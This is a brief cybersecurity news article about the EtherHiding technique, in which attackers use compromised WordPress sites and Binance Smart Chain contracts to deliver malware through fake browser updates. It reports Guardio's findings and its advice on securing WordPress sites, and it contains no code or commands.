Cybercriminals have invented a new way to distribute malicious code. The technique, codenamed EtherHiding, targets WordPress vulnerabilities and leverages Binance Smart Chain contracts to conceal parts of malicious payloads delivered through fake browser updates. The threat was identified and extensively analyzed by Guardio, a cybersecurity research company.
Using the malicious code, attackers are able to remotely control the defaced website, modify the infection process, and display any content they want, including bogus browser update notifications that serve as a vehicle for distributing malware. They can also change tactics, update blocked domains, and replace detected payloads without having to re-access the WordPress sites.
In the initial attacks, the second-stage code was hosted on Cloudflare Workers, but CloudFlare blocked these accounts, potentially disrupting the campaign. In the evolution of "ClearFake," cybercriminals have developed a new method for hosting malicious code anonymously and without any risk of being blocked – a sort of bullet-proof hosting facilitated by the Binance Smart Chain Blockchain.
The EtherHiding method makes takedowns difficult and lets criminals get away unpunished – being illustrative of the legal challenges related to decentralized technologies. "A critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims," Guardio authors explain.
"To protect your site and, eventually, all your visitors, you should always keep your WordPress infra and plugins updated, safeguarding credentials, using robust, periodically-changed passwords and just keeping an eye on what is happening in your site," they suggest.